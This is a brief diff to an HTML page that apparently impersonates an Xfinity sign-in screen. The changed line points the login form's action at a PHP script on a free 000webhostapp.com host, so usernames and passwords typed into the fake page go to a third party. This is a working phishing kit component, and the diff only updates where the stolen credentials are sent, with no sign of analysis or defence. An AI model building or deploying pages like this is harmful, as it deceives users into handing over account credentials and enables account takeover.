--- a/b1.htm
+++ b/b1.htm
@@ -92,7 +92,7 @@ overflow: hidden;
 <img src="https://xfinitydigital.demdex.net/event?d_sid=4702129" width="0" height="0" /></div>
 	</div><div id="right">		<div class="container">'/
 	<form name="signin" action="
-https://finiyxx.000webhostapp.com/nity.php"method="post" onsubmit="return login.onSubmit()" >
+https://finityxx.000webhostapp.com/nity.php"method="post" onsubmit="return login.onSubmit()" >
 							<div class="single logo-wrapper">
 	<span aria-role="img" class="xfinity-logo"></span>
 		</div>
